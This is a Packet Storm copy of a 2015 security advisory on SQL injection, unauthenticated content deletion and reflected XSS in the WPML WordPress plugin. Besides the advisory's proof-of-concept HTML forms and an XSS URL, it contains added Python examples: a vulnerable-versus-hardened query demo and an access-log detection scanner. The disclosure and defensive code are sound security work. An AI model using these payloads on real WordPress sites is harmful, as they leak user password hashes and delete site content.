WordPress WPML XSS / Deletion / SQL Injection

đŸ—“ïžÂ 13 Mar 2015 00:00:00Reported by Jouko PynnonenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 37 Views

WPML SQL Injection and XSS vulnerabilities. Update to version 3.1.9.1 to mitigate risk

OVERVIEW  
==========  
  
WPML is the industry standard for creating multi-lingual WordPress  
sites. Three vulnerabilities were found in the plug-in. The most  
serious of them, an SQL injection problem, allows anyone to read the  
contents of the WordPress database, including user details and  
password hashes, without authentication.  
  
System administrators should update to version 3.1.9.1 released  
earlier this week to resolve the issues.  
  
  
  
DETAILS  
========  
  
1. SQL injection  
  
When WPML processes an HTTP POST request containing the parameter  
"action=wp-link-ajax", the current language is determined by parsing  
the HTTP Referer header. The parsed language code is neither checked for  
validity nor SQL-escaped. The user doesn't need to be logged in.  
  
By sending a carefully crafted referer value with the mentioned POST  
request parameter, an attacker can perform SQL queries on arbitrary  
tables and retrieve their results. In addition to the standard  
WordPress database and tables, the attacker may query all other  
databases and tables accessible to the web backend.  
  
The following HTML snippet demonstrates the vulnerability:  
  
<script>  
var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users";  
if (document.location.search.length < 2)  
  document.location.search="lang=xx' UNION "+union+" -- -- ";  
</script>  
  
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">  
<input type=hidden name=action value="wp-link-ajax">  
<input type=submit>  
</form>  
  
The results of the SQL query are returned in the comments feed, XML-formatted.  
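The following Python script is added here as an illustration; it is not part of the original advisory and not WPML's code. It reproduces the pattern described above on a constructed SQLite schema (WordPress-style table names with reduced columns and made-up rows; the wp_icl_languages table and the lookup query are assumptions). vulnerable_lookup() builds the query by string concatenation from the Referer's lang parameter, the way the advisory describes, so a Referer shaped like the proof of concept pulls rows out of wp_users through the UNION. hardened_lookup() first validates the code against a language-code pattern and then binds it as a query parameter, so the same Referer yields no rows.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlparse

# Constructed toy schema: WordPress-style table names, reduced columns, made-up rows.
# The wp_icl_languages table and the lookup query below are assumptions for the
# illustration, not WPML's actual code.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_email TEXT, user_pass TEXT);
CREATE TABLE wp_icl_languages (code TEXT PRIMARY KEY, english_name TEXT);
INSERT INTO wp_users VALUES (1, 'admin', 'admin@example.test', '$P$constructedhash');
INSERT INTO wp_icl_languages VALUES ('en', 'English'), ('fi', 'Finnish');
"""

# A language code is a short lowercase tag such as "en" or "zh-hans"; nothing else is accepted.
LANG_RE = re.compile(r"^[a-z]{2,3}(-[a-z]{2,4})?$")


def connect():
    """Open an in-memory database populated with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lang_from_referer(referer):
    """Pull the lang query parameter out of the Referer URL as received (no validation)."""
    return parse_qs(urlparse(referer).query).get("lang", [None])[0]


def vulnerable_lookup(conn, referer):
    """The pattern the advisory describes: the Referer-supplied code goes straight into the SQL text."""
    lang = lang_from_referer(referer)
    sql = f"SELECT code, english_name FROM wp_icl_languages WHERE code='{lang}'"
    return conn.execute(sql).fetchall()


def hardened_lookup(conn, referer):
    """Validate the code first, then bind it as a parameter so it can never alter the query."""
    lang = lang_from_referer(referer)
    if lang is None or not LANG_RE.match(lang):
        return []
    return conn.execute(
        "SELECT code, english_name FROM wp_icl_languages WHERE code=?", (lang,)
    ).fetchall()


if __name__ == "__main__":
    db = connect()
    # Referer shaped like the advisory's proof of concept, with the column list cut
    # down to two so that it lines up with the toy table.
    crafted = "https://blog.example/?lang=xx' UNION select user_login,user_pass from wp_users -- -- "
    print("vulnerable:", vulnerable_lookup(db, crafted))   # wp_users rows leak through the UNION
    print("hardened:  ", hardened_lookup(db, crafted))     # []
    print("normal:    ", hardened_lookup(db, "https://blog.example/?lang=fi"))
```

In a real plugin the strictest check is membership in the site's configured language list rather than a regex; the regex here only shows that validating before binding, and binding instead of concatenating, each independently stop the crafted value from reaching the SQL parser as code.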
  
  
  
2. Page/post/menu deletion  
  
WPML contains a "menu sync" function which helps site administrators  
keep WordPress menus consistent across different languages. This  
functionality lacked any access control, allowing anyone to delete  
practically all content of the website - posts, pages, and menus.  
  
Example:  
  
<form method=POST  
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">  
<input type=hidden name="action" value="icl_msync_confirm">  
<input type=text name="sync" size=50 value="del[x][y][12345]=z">  
<input type=submit>  
</form>  
  
Submitting the above form would delete the row with ID 12345 in  
the wp_posts table. Several items can be deleted with the same request.  
  
  
  
3. Reflected XSS  
  
The "reminder popup" code intended for administrators in WPML didn't  
check for login status or nonce. An attacker can direct target users  
to a URL like:  
  
https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f  
  
  
to execute JavaScript in their browser. This example bypasses the  
Chrome XSS Auditor.  
  
In the case of WordPress, XSS triggered by an administrator can lead  
to server-side compromise via the plugin and theme editors.  
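For detection, the following Python snippet (an added example, not from the advisory or from WPML) scans web-server access logs in the combined log format for the three request shapes described in sections 1 to 3. The log lines are constructed for the example and the finding labels are names chosen here. Logs only show part of the picture: the action parameter travels in the POST body, which the combined format does not record, so the menu-sync rule flags every POST to the sync page for review against the session that sent it, and the Referer rule flags any lang value that is not a plain language code, whichever endpoint received it.

```python
import re
from urllib.parse import parse_qs, urlparse

# Combined log format:
# host ident user [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# What a legitimate WPML language code looks like; anything else in lang= is suspect.
LANG_RE = re.compile(r"^[a-z]{2,3}(-[a-z]{2,4})?$")

# Constructed sample lines: three shaped like the advisory's examples, two benign.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Mar/2015:10:01:02 +0200] "POST /comments/feed HTTP/1.1" 200 812 '
    '"https://blog.example/?lang=xx%27%20UNION%20select%20user_login%2Cuser_pass%20from%20wp_users%20--%20--%20" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Mar/2015:10:01:09 +0200] "POST /?page=sitepress-multilingual-cms/menu/menus-sync.php HTTP/1.1" 302 0 '
    '"https://blog.example/" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Mar/2015:10:01:15 +0200] "GET /?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f HTTP/1.1" 200 431 '
    '"-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Mar/2015:10:02:00 +0200] "GET /fi/?lang=fi HTTP/1.1" 200 5120 '
    '"https://blog.example/?lang=fi" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Mar/2015:10:02:30 +0200] "GET /?icl_action=reminder_popup&target=https%3A%2F%2Fwpml.org%2F HTTP/1.1" 200 431 '
    '"-" "Mozilla/5.0"',
]


def _query(url_or_path):
    """Decode the query string of a URL or request path into {name: [values]}."""
    return parse_qs(urlparse(url_or_path).query, keep_blank_values=True)


def classify(line):
    """Return the list of finding labels for one log line (empty if benign, None if unparsable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path, referer = m["method"], m["path"], m["referer"]
    findings = []
    # 1. SQL injection: WPML reads the language code from the Referer, so a lang value
    #    that is not a plain language code is the observable part of that attack.
    ref_lang = _query(referer).get("lang", [None])[0]
    if ref_lang is not None and not LANG_RE.match(ref_lang):
        findings.append("wpml-referer-lang-injection")
    q = _query(path)
    # 2. Menu sync deletion: the icl_msync_confirm action is in the POST body and is not
    #    logged, so every POST to the sync page is surfaced for an authorization check.
    if method == "POST" and "sitepress-multilingual-cms/menu/menus-sync.php" in q.get("page", []):
        findings.append("wpml-menu-sync-post")
    # 3. Reflected XSS: reminder_popup whose target is not an http(s) URL.
    if "reminder_popup" in q.get("icl_action", []):
        target = q.get("target", [""])[0].strip().lower()
        if not target.startswith(("http://", "https://")):
            findings.append("wpml-reminder-popup-xss")
    return findings


def scan(lines):
    """Return (1-based line number, findings) for every line that produced at least one finding."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = classify(line)
        if findings:
            hits.append((number, findings))
    return hits


if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ", ".join(findings))
```

Run against a real access log, pipe the file's lines into scan(); hits on the menu-sync rule need to be joined with the application's session or audit data, since a logged-in administrator legitimately makes the same POST.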
  
  
  
CREDITS  
========  
  
The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while  
researching WordPress plugins falling in the scope of the Facebook bug  
bounty program.  
  
The vendor was notified on March 02, 2015 and the patch was released  
on March 10.  
  
Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/  
  
An up-to-date version of this document can be found on our website  
http://klikki.fi .  
  
  
--   
Jouko Pynnönen <[email protected]>  
Klikki Oy - http://klikki.fi  
